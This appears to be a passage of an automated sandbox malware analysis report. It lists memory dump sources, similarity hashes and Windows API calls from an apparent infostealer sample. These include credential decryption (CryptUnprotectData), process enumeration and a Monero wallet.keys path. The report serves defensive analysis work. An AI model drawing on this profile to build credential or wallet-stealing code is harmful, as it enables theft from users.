                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                   • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: 2449315b367d9fbfffb292e231c8d4cf375c0e12a9ac3cc4d4cbed7ccca796cf
                  • Instruction ID: e77482c67be05a83ce355bffeeb443e8f81c009241002d9199cb9684ec3b84ea
                  • Opcode Fuzzy Hash: 2449315b367d9fbfffb292e231c8d4cf375c0e12a9ac3cc4d4cbed7ccca796cf
                  • Instruction Fuzzy Hash: EA415F7994431ADBDB10DFA4DD89BEEBBB8BB44304F1042A8E509A62C0D7745A84CFA1
                  APIs
                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B0724D
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B07254
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B07281
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00B072A4
                  • LocalFree.KERNEL32(?), ref: 00B072AE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                   • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                  • String ID:
                  • API String ID: 2609814428-0
                  • Opcode ID: 0a944a183cbc32e2a55da792e2b12f94be8ba28b9f1713c1e2dd2bcde13caea7
                  • Instruction ID: 7a7cd34dbff373d3c5a5d569ef8a04e4b906c1c014fa64d967f2b27f0a7ec64a
                  • Opcode Fuzzy Hash: 0a944a183cbc32e2a55da792e2b12f94be8ba28b9f1713c1e2dd2bcde13caea7
                  • Instruction Fuzzy Hash: F70100B5A80308BBEB10DFD8DD49F9D77B8EB44704F104155FB05EA2C0DA70AA008B65
                  APIs
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B1961E
                  • Process32First.KERNEL32(00B20ACA,00000128), ref: 00B19632
                  • Process32Next.KERNEL32(00B20ACA,00000128), ref: 00B19647
                  • StrCmpCA.SHLWAPI(?,00000000), ref: 00B1965C
                  • CloseHandle.KERNEL32(00B20ACA), ref: 00B1967A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                   • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                  • String ID:
                  • API String ID: 420147892-0
                  • Opcode ID: 3f09f992780dec1101f8aae60129108499ca86cd60ae4bb4d7c823b90473d56d
                  • Instruction ID: 3bc8cb625a8886e5fd1aacca242d5ca8b69a88bdd2cd6d9d0bb0c8bb63c13b74
                  • Opcode Fuzzy Hash: 3f09f992780dec1101f8aae60129108499ca86cd60ae4bb4d7c823b90473d56d
                  • Instruction Fuzzy Hash: 1B010079A40308ABCB14DFA5CD54BDDB7F8EB48700F5041C8A505D6250D7349B80CF61
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00B205B7), ref: 00B186CA
                  • Process32First.KERNEL32(?,00000128), ref: 00B186DE
                  • Process32Next.KERNEL32(?,00000128), ref: 00B186F3
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • CloseHandle.KERNEL32(?), ref: 00B18761
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                   • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                  • String ID:
                  • API String ID: 1066202413-0
                  • Opcode ID: db30ef37bdc7c1320564d8ca958031368c9764910ce1f7052d69a3da71b6a14e
                  • Instruction ID: 61ae4e30c6208c45b3cdba0c969b7493ea4dc8a42823c6afecd37193f26aea1b
                  • Opcode Fuzzy Hash: db30ef37bdc7c1320564d8ca958031368c9764910ce1f7052d69a3da71b6a14e
                  • Instruction Fuzzy Hash: 90314D71902218ABCB24EF54DC45FEEB7B8FF45710F5041D9E10AA21A0DB306E85CFA1
                  APIs
                  • CryptBinaryToStringA.CRYPT32(00000000,00B05184,40000001,00000000,00000000,?,00B05184), ref: 00B18EC0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                   • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 94cb1b8e85dbbd20af7ee81d66ba2efaaf3db00af05d0cd4c310694e5476bea0
                  • Instruction ID: d18e72fdf26fec89986f621abe07737336e2f03e91f50bf558aa4bb349b0c807
                  • Opcode Fuzzy Hash: 94cb1b8e85dbbd20af7ee81d66ba2efaaf3db00af05d0cd4c310694e5476bea0
                  • Instruction Fuzzy Hash: 4C11DA75200205AFDB00CFA4D885FA637EAFF89714F509998F9198B250DB75E981DB60
                  APIs
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09AEF
                  • LocalAlloc.KERNEL32(00000040,?,?,?,00B04EEE,00000000,?), ref: 00B09B01
                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09B2A
                  • LocalFree.KERNEL32(?,?,?,?,00B04EEE,00000000,?), ref: 00B09B3F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptLocalString$AllocFree
                  • String ID:
                  • API String ID: 4291131564-0
                  • Opcode ID: e6338474e0b58b9fb353fcee6214d63c1fdc89ad226cac718e3dc8a669c981e9
                  • Instruction ID: 1fa4dc2b2d4da520b63b41d6f5626cedc43e030bc668e7c531d14048eae136c4
                  • Opcode Fuzzy Hash: e6338474e0b58b9fb353fcee6214d63c1fdc89ad226cac718e3dc8a669c981e9
                  • Instruction Fuzzy Hash: 091174B8641308AFEB10CF64DC95FAA77B5FB89714F208158F9159B3D0C776A941CB60
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00B20E00,00000000,?), ref: 00B179B0
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B179B7
                  • GetLocalTime.KERNEL32(?,?,?,?,?,00B20E00,00000000,?), ref: 00B179C4
                  • wsprintfA.USER32 ref: 00B179F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 5a8cb318dd32a879aa85632b537e8c8dc137f5a04ed9536b4307bff3bc9d21d9
                  • Instruction ID: bea12e5032506fa11ed074a6feeb04ad646b68d89dd0936693b8abde5e622608
                  • Opcode Fuzzy Hash: 5a8cb318dd32a879aa85632b537e8c8dc137f5a04ed9536b4307bff3bc9d21d9
                  • Instruction Fuzzy Hash: 4C1127B2944218ABCB14DFC9DD45BBEB7F8FB4DB11F10425AF605A2280E6395940CBB1
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,011FD8C8,00000000,?,00B20E10,00000000,?,00000000,00000000), ref: 00B17A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,011FD8C8,00000000,?,00B20E10,00000000,?,00000000,00000000,?), ref: 00B17A7D
                  • wsprintfA.USER32 ref: 00B17AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: a1309e997bba2d5b6c58b73cb84e13d3515325219e796060b225f9b6db8f089e
                  • Instruction ID: 29d80129b923c07dbd489c5021b26d98209c52f6e9b946ac99cb708b78d2786c
                  • Opcode Fuzzy Hash: a1309e997bba2d5b6c58b73cb84e13d3515325219e796060b225f9b6db8f089e
                  • Instruction Fuzzy Hash: B51170B1985228DBEB108F58DC45F9AB7B8FB05711F1042D6E50A93290CB741A40CF51
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ZR1$bJ6O$e?_]
                  • API String ID: 0-2852574638
                  • Opcode ID: 261c4b0ee95d6220f13897671e4e639d232c9e2b35a7e366731d5182a2926911
                  • Instruction ID: 6dd82de4ac96bce5e041efc5a32dbc63cd0458fc60494862ef254a80b3adedc0
                  • Opcode Fuzzy Hash: 261c4b0ee95d6220f13897671e4e639d232c9e2b35a7e366731d5182a2926911
                  • Instruction Fuzzy Hash: CBB218F3A0C2049FE304AE2DDC8566ABBE9EFD4320F1A493DEAC4D7744E93558058796
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: ^lM$a,}l$o)W'
                  • API String ID: 0-1291390679
                  • Opcode ID: c1d4b6e205df9b0e6fdb5ef93fe3e3865e4e9cf34c22b13516329cbd9a499106
                  • Instruction ID: 65edc681b631d9d4f6a6121fbf8dc2615d173fe9d59794efe292a5ce5749305f
                  • Opcode Fuzzy Hash: c1d4b6e205df9b0e6fdb5ef93fe3e3865e4e9cf34c22b13516329cbd9a499106
                  • Instruction Fuzzy Hash: EBB239F36082049FD304AE2DEC8567AFBE9EF94720F1A493DEAC5C7744E93598058693
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 4wy$An~=$m[}w
                  • API String ID: 0-1696683974
                  • Opcode ID: 05fa59f7a442931669c77dceaa637ac1c8f7c9425af070fa046a0459b80431a8
                  • Instruction ID: 7ee199964c020fb10b1ed393c765fa419a4f5d03c8274b3a36aea6122c85b43a
                  • Opcode Fuzzy Hash: 05fa59f7a442931669c77dceaa637ac1c8f7c9425af070fa046a0459b80431a8
                  • Instruction Fuzzy Hash: 499227F360C204AFE7046E2DEC8567AFBE9EF94320F1A493DE6C5D3740EA7558018696
                  APIs
                  • CoCreateInstance.COMBASE(00B1E118,00000000,00000001,00B1E108,00000000), ref: 00B13758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00B137B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
